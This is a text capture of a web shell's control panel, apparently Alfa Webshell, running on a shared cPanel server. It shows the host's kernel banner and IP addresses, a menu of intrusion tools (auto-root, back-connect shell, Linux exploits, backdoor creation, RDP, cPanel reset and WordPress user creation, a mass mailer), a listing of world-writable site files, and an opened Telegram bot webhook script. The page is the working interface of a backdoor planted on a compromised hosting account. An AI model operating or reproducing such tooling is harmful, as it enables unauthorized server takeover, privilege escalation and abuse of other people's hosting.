Linux s3.cpanelhost.co.in 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
LiteSpeed
: 65.108.44.247 | : 216.73.217.179
Cant Read [ /etc/named.conf ]
7.4.33
teac11783
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
teac11783 /
adv-bot-pnl-2.teacherslex.site /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxrwxrwx
includes
[ DIR ]
drwxrwxrwx
pannel - Copy (2)
[ DIR ]
drwxrwxrwx
.htaccess
281
B
-rw-r--r--
adv-bot-pnl-2.teacherslex.site...
5.6
KB
-rw-r--r--
api.php
5.12
KB
-rw-rw-rw-
api_broadcast.php
5.94
KB
-rw-rw-rw-
auth.php
2.73
KB
-rw-rw-rw-
bcreate.php
0
B
-rw-r--r--
cleaner.php
0
B
-rw-r--r--
config.php
982
B
-rw-rw-rw-
cron_webhook.php
2.81
KB
-rw-rw-rw-
error_log
419
B
-rw-r--r--
guide.txt
2.38
KB
-rw-rw-rw-
index.php
21.29
KB
-rw-rw-rw-
load.php
0
B
-rw-r--r--
monitor.php
4.26
KB
-rw-rw-rw-
pannel - Copy (2).zip
30.28
KB
-rw-r--r--
readme.txt
1.8
KB
-rw-rw-rw-
worker.js
22.55
KB
-rw-rw-rw-
xxx.txt
3
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cron_webhook.php
<?php /** * CRON WEBHOOK SYNC SCRIPT * This script automatically updates webhooks for all enabled bots. * Set this as a cron job every 5 minutes for maximum stability. * * Usage (CLI): php cron_webhook.php * Usage (Browser): cron_webhook.php?key=YOUR_MASTER_PIN */ require_once __DIR__ . '/config.php'; // Security check: Only allow CLI or valid Master PIN in URL if (php_sapi_name() !== 'cli' && (!isset($_GET['key']) || $_GET['key'] !== MASTER_PIN)) { header('HTTP/1.1 401 Unauthorized'); die("Unauthorized Access. Run via CLI or provide valid ?key="); } $bots = $bots_list; // This variable is automatically populated in config.php $processed = 0; $success = 0; $log_details = []; foreach ($bots as $bot) { $token = $bot['bot_token'] ?? ''; $enabled = isset($bot['enabled']) ? $bot['enabled'] : ($bot['status'] ?? false); // Skip empty tokens or disabled bots if (empty($token) || $enabled === false || $enabled === 'false') { continue; } $processed++; // The Webhook destination URL (Worker/Endpoint) $webhook_destination = "https://advance-slex.visheshgt0708.workers.dev/{$token}"; $allowed_updates = json_encode(["message", "chat_join_request", "chat_member"]); // Telegram API setWebhook URL $api_url = "https://api.telegram.org/bot{$token}/setWebhook?url=" . urlencode($webhook_destination) . "&allowed_updates=" . urlencode($allowed_updates); // Execute Request $ch = curl_init($api_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $response_raw = curl_exec($ch); $curl_error = curl_error($ch); curl_close($ch); $response = json_decode($response_raw, true); if (isset($response['ok']) && $response['ok'] === true) { $success++; $status_msg = "SUCCESS"; } else { $status_msg = "FAILED: " . ($response['description'] ?? $curl_error ?? 'Unknown error'); } $log_details[] = [ 'bot_token_snip' => substr($token, 0, 8) . '...', 'status' => $status_msg ]; } // Output Results for logging if (php_sapi_name() === 'cli') { echo "[" . date('Y-m-d H:i:s') . "] Webhook Sync Started.\n"; echo "Total Active Nodes Found: " . count($bots) . "\n"; echo "Processed: $processed | Success: $success\n"; foreach($log_details as $log) { echo "- {$log['bot_token_snip']} : {$log['status']}\n"; } } else { header('Content-Type: application/json'); echo json_encode([ 'status' => 'completed', 'timestamp' => date('Y-m-d H:i:s'), 'summary' => [ 'total_active' => count($bots), 'processed' => $processed, 'success' => $success ], 'details' => $log_details ], JSON_PRETTY_PRINT); } ?>
Close